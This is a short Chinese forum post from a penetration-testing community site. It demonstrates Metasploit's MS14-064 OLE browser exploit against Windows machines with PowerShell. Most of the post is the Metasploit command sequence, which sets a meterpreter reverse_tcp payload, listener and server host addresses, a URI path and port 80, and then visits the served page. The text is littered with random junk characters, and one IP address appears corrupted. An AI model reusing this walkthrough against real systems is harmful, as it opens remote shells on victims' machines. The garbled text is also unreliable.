% S" ]0 X9 W' j! i o, ~ 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示8 |3 ^7 \9 C: O. T# f
' O5 r% ^" F, p' u
开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图:
然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp# N E! w$ O, B- q; ~) Z: G
; q3 x5 d6 y! i! } set AllowPowershellPrompt true
. E/ q& ?% Y, }% u6 V! C- cSet LHOST 192.168.0.109
* h& E% ^6 c: s" }4 ]+ wset SRVHOST 192.168.0.1096 ^" H1 H) t# E; {
Set uripath share' W6 ^/ q, [" F+ G3 l' @
' \7 h5 P9 |) Q4 r! q+ T m- l# C; |. ]9 G- ^8 m; W- \+ k0 Q" [ Set srvport 80
F2 @9 S9 W8 U+ x" V! e4 T
" h8 q! z; Y4 W8 ~2 ]( ]
; n$ R( F% m' |+ l p
; q; z# ~+ R: n, k* f7 v
8 |+ J1 H. H2 b. I9 Y& m& M1 n1 D$ g: V# m7 |
* N: c& Z+ L2 N: F: E+ ~ D 下面我们来访问本地地址如图:: L' M' x* P% `2 U; `5 S6 Y4 c" V
) T; q" _* `: k# _4 V; Q3 ]! C% N: c0 y: ]( y* o" f6 o$ z' t! T
, O' z' n# U' N$ j) _+ N1 u4 K1 e1 w' k; | i3 `
# A+ r) w7 L7 E( Q1 _' X5 l- Y
| 欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) | Powered by Discuz! X3.2 |